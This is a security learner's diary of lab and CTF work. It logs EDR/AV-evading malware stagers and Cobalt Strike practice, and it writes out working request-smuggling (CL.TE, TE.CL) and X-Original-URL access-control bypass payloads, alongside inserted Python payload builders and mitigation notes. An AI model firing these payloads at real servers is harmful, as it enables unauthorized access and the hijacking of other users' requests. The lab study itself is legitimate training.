Daily diary

This is a collection of my daily adventures in cyber learning

24.10.2024

Malware development

  • Spent all week trying to defeat Elastic EDR
  • Today I DID IT

18.10.2024

RTO exam day 1

  • Finished all machines
  • Was fun

17.10.2024

Home lab setup

  • Set up Elasticsearch and Kibana with Fleet Server and EDR

16.10.2024

RTO

  • Played around with Cobalt Strike, exam prep

15.10.2024

Malware development

  • Created a stager using Local Mapping Injection method

Red Team Ops

  • Played around with bypassing defender with UAC-bypasses

14.10.2024

Malware development

  • Created a stager using Early Bird APC method

13.10.2024

Malware development

  • Thread-hijacking stager
  • APC-injection stager

12.10.2024

Malware development

  • Set up dev environment
  • Made a basic template for a stager which uses AES and Base64 to avoid AV

11.10.2024

RTO

  • Set up PortBender and a SOCKS proxy via Cobalt Strike

10.10.2024

Off day

  • Played around with a friend's new WooCommerce store

9.10.2024

Lazy day

  • Played around with Active Directory Certificate Services on RTO

8.10.2024

Burp Suite

  • Got exam result (passed)
  • Active Directory on RTO

7.10.2024

RTO

  • Cobalt Strike
  • Created a custom CNA

6.10.2024

RTO

  • Got another month on RTO labs
  • Antivirus evasion with Cobalt Strike
  • Mostly a refresher

5.10.2024

Huntress CTF

  • Did one of the most useless challenges to date

HTB Academy

  • Started Advanced Deserialization Attacks module
  • Dotnet deserialization vulns

4.10.2024

Burpsuite exam

  • Got all the solutions, waiting for the final result, should pass unless something weird happens

Huntress CTF

  • Some bullshit challenges this time around

3.10.2024

Huntress CTF!

  • Some log analysis, nothing interesting
  • Did some dynamic analysis on a powershell script via procmon

2.10.2024

Huntress CTF !

  • Some phishing, nothing really exciting here

1.10.2024

Huntress CTF!

  • jse file decrypting!
  • can be done with https://github.com/sstraw/scrdec
  • UPDATE: Even better! Use CyberChef!!!

30.9.2024

Burpsuite Academy

  • Random labs here and there

29.9.2024

Burpsuite Academy

  • Some mystery boxes, tried SQL injection via burp

28.9.2024

Burpsuite Academy

Practice exam

  • Did another practice exam
  • Did not pass on time again (had some breaks, was very close on first try even with breaks)
  • Second try managed to solve it in very little time

XSS practice

  • Did some labs to practice XSS filter evasion

27.9.2024

Burpsuite academy

  • Did a practice exam and some mystery boxes
  • Failed on time, managed to solve it on second try
  • Need to focus more on filter evasion

26.9.2024

BurpSuite Academy

Access Control

  • Nothing really new here, good refresher
  • Some headers to try to bypass front-end restrictions on routes. They work when the front-end decides on the request-line path but the back-end rewrites the path from the header value (Symfony's HttpFoundation, for example, has historically honoured both):
X-Original-URL
X-Rewrite-URL

Eg

GET / HTTP/2
Host: 0a3600fd0451e51281233422003600f9.web-security-academy.net
X-Original-Url: /admin
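The mechanism above as an added example (not from the diary and not any real framework's code): a toy front-end that enforces the ACL on the request-line path only, a toy back-end that routes on the override header when `honour_override` is on (the hardened setting is off), and the probe you would run against a blocked route. All names are constructed for the illustration.

```python
# Added example (not from the diary or from any real framework): a toy
# front-end/back-end pair showing why X-Original-URL / X-Rewrite-URL bypass a
# path-based ACL, and the probe you would run against a blocked route.

RESTRICTED_PREFIXES = ("/admin",)
OVERRIDE_HEADERS = ("X-Original-URL", "X-Rewrite-URL")


def back_end(path: str, headers: dict, honour_override: bool) -> tuple:
    """Back-end app. With honour_override=True it routes on the override
    header instead of the request line (the behaviour some frameworks have
    when the header is trusted); False is the hardened configuration."""
    lower = {k.lower(): v for k, v in headers.items()}
    if honour_override:
        for name in OVERRIDE_HEADERS:
            if name.lower() in lower:
                path = lower[name.lower()]
                break
    if path.startswith("/admin"):
        return 200, "admin panel"
    return 200, "public page"


def front_end(path: str, headers: dict, honour_override: bool = True) -> tuple:
    """Front-end proxy ACL: decides on the request-line path only and never
    looks at the override headers. Returns (status, body)."""
    if any(path == p or path.startswith(p + "/") for p in RESTRICTED_PREFIXES):
        return 403, "blocked by front-end"
    return back_end(path, headers, honour_override)


def probe(blocked_path: str, honour_override: bool = True) -> dict:
    """Try each override header on an allowed path; report what came back.
    A different status or body than the direct request means the back-end
    is honouring the header."""
    results = {"direct": front_end(blocked_path, {}, honour_override)}
    for name in OVERRIDE_HEADERS:
        results[name] = front_end("/", {name: blocked_path}, honour_override)
    return results


if __name__ == "__main__":
    for cfg in (True, False):
        print("honour_override =", cfg)
        for key, value in probe("/admin", cfg).items():
            print(f"  {key:15s} -> {value}")
```

The fix is the `honour_override=False` path: either the back-end ignores these headers entirely, or the front-end strips them before forwarding; a front-end ACL that only inspects the request line is not enough.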

Cache flaws

  • Same here, HTB EasterBunny taught me well on the cache things!
  • One random trick: language cookies can also be cached, rarely, but sometimes

25.9.2024

Burpsuite Academy

Request smuggling

  • Tried to understand how this vuln actually works

    1) CL.TE

  • The front-end determines the request length from the Content-Length header, the back-end from Transfer-Encoding: chunked

  • To exploit it, craft one request whose Content-Length covers the chunked body plus a trailing partial request. The front-end forwards all of it as a single request; the back-end stops at the terminating 0 chunk and keeps whatever follows as the start of the next request on that connection

Example (every line ends with \r\n, including the empty line after the 0 chunk):

POST / HTTP/1.1
Host: 0aff002304fcf3238029800a00c400e7.web-security-academy.net
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

Here Content-Length (49) covers everything after the blank line that ends the headers, so the front-end forwards the whole thing as one request. The chunk size e (14 in decimal) is the length of "q=smuggling&x=", and the 0 chunk ends the chunked body for the back-end. The back-end therefore answers the POST and treats the leftover "GET /404 HTTP/1.1" / "Foo: x" as the beginning of the next request; because it has no terminating blank line, the back-end keeps waiting. The next request on that connection, ours or another user's, is appended to it (its first line lands after "Foo: x"), and whoever sent it gets a 404 because /404 does not exist.

2) TE.CL

  • The reverse: the front-end uses Transfer-Encoding, the back-end Content-Length. Send a small Content-Length that covers only the chunk-size line and put the smuggled request inside the chunk

Example:

POST / HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

9e
GET /404 HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

Here Content-Length is 4, exactly the "9e\r\n" chunk-size line. The chunk size 9e (158 in decimal) covers the smuggled request from "GET" through "x=". The front-end uses TE, reads up to the 0 chunk and forwards everything as one request. The back-end uses CL, takes "9e\r\n" as the body of the POST, and treats the rest as a second request. The smuggled Content-Length: 144 is larger than the bytes that remain, so the back-end waits, and the next request on the connection becomes the body of GET /404; whoever sent it gets the 404. In Burp Repeater, turn off automatic Content-Length updating and make sure the trailing \r\n after the 0 chunk is present.
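Both desyncs as an added example (not from the diary, and not any real server's parser): two toy parsers that split the same byte stream the way a Content-Length-only server and a Transfer-Encoding-only server would, plus builders that compute the sizes for the two requests above (49, e, 4 and 9e) instead of counting by hand. The hostname is the lab host from the TE.CL example; everything else is a constructed model.

```python
# Added example (not from the diary): a model of how a Content-Length-only
# parser and a Transfer-Encoding-only parser split the *same* byte stream,
# plus builders that compute the sizes used in the two requests above.
# The hostname is the lab value from the page; the parsers are a
# constructed model, not any real server's code.

LAB_HOST = "0ae600f6039234d480b2d0de00e0009e.web-security-academy.net"


def _header(head: bytes, name: bytes):
    """Return the value of header `name` (lower-case bytes) or None."""
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        key, _, value = line.partition(b":")
        if key.strip().lower() == name:
            return value.strip()
    return None


def split_by_cl(stream: bytes):
    """Split like a server that only honours Content-Length.
    Returns (complete_requests, leftover bytes still waiting for more)."""
    reqs = []
    while stream:
        end = stream.find(b"\r\n\r\n")
        if end < 0:
            break                                   # headers not finished yet
        n = int(_header(stream[:end], b"content-length") or b"0")
        total = end + 4 + n
        if len(stream) < total:
            break                                   # body not finished yet
        reqs.append(stream[:total])
        stream = stream[total:]
    return reqs, stream


def split_by_te(stream: bytes):
    """Split like a server that prefers Transfer-Encoding: chunked.
    Assumes well-formed chunks and no trailers."""
    reqs = []
    while stream:
        end = stream.find(b"\r\n\r\n")
        if end < 0:
            break
        head = stream[:end]
        te = _header(head, b"transfer-encoding")
        if te is None or te.lower() != b"chunked":
            total = end + 4 + int(_header(head, b"content-length") or b"0")
        else:
            pos = end + 4
            while True:                             # walk chunk by chunk
                line_end = stream.find(b"\r\n", pos)
                if line_end < 0:
                    return reqs, stream             # chunk-size line incomplete
                size = int(stream[pos:line_end], 16)
                pos = line_end + 2 + size + 2       # size line, data, CRLF
                if size == 0:
                    break                           # "0\r\n\r\n" ends the body
            total = pos
        if len(stream) < total:
            break
        reqs.append(stream[:total])
        stream = stream[total:]
    return reqs, stream


def build_cl_te(host: str, smuggled: bytes, data: bytes = b"q=smuggling&x=") -> bytes:
    """CL.TE: Content-Length covers the chunked body *and* the smuggled tail."""
    body = (f"{len(data):x}\r\n".encode() + data + b"\r\n0\r\n\r\n") + smuggled
    head = (f"POST / HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\nTransfer-Encoding: chunked\r\n\r\n")
    return head.encode() + body


def build_te_cl(host: str, request_line: str, fake_cl: int = 144) -> bytes:
    """TE.CL: the smuggled request lives inside one chunk; Content-Length
    covers only the chunk-size line, so a CL back-end stops right there."""
    ctype = "application/x-www-form-urlencoded"
    smuggled = (f"{request_line}\r\nHost: {host}\r\nContent-Type: {ctype}\r\n"
                f"Content-Length: {fake_cl}\r\n\r\nx=").encode()
    size_line = f"{len(smuggled):x}\r\n".encode()
    body = size_line + smuggled + b"\r\n0\r\n\r\n"
    head = (f"POST / HTTP/1.1\r\nHost: {host}\r\nContent-Type: {ctype}\r\n"
            f"Content-Length: {len(size_line)}\r\nTransfer-Encoding: chunked\r\n\r\n")
    return head.encode() + body


if __name__ == "__main__":
    cl_te = build_cl_te(LAB_HOST, b"GET /404 HTTP/1.1\r\nFoo: x")
    print("CL.TE front-end (CL) leftover:", split_by_cl(cl_te)[1])
    print("CL.TE back-end  (TE) leftover:", split_by_te(cl_te)[1])
    te_cl = build_te_cl(LAB_HOST, "GET /404 HTTP/1.1")
    print("TE.CL front-end (TE) leftover:", split_by_te(te_cl)[1])
    print("TE.CL back-end  (CL) leftover:", split_by_cl(te_cl)[1][:40])
```

The "leftover" value is the whole point: for the CL.TE payload the CL parser has nothing left over while the TE parser is left holding "GET /404 ... Foo: x"; for the TE.CL payload it is the other way round. Whichever parser is left with a dangling partial request is the one that will glue the next user's request onto it.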

24.9.2024

Browsed through BurpSuite Academy

Logic bugs

Nothing major, just a reminder to always try the unintended application flow: send unexpected or intentionally omitted parameters, and skip steps where possible (don't follow redirects etc.).

E.g. with numbers use negative or very large values; with strings use very long ones.

Some basic deserialization

Nothing new, nice reminder of mostly PHP deserialization vulnerabilities

Nice caveat: in PHP 7 and earlier, loosely comparing the integer 0 to a non-numeric string returns true, because the string is converted to a number (0) first. PHP 8 changed this: the int is converted to a string instead, so 0 == "test" is false. Numeric strings still compare numerically on every version ("1e1" == "10" and "0e123" == "0e456" are both true). Eg

if(0 == "test") {echo "???";}   // PHP 7.x and earlier: prints ???; PHP 8: prints nothing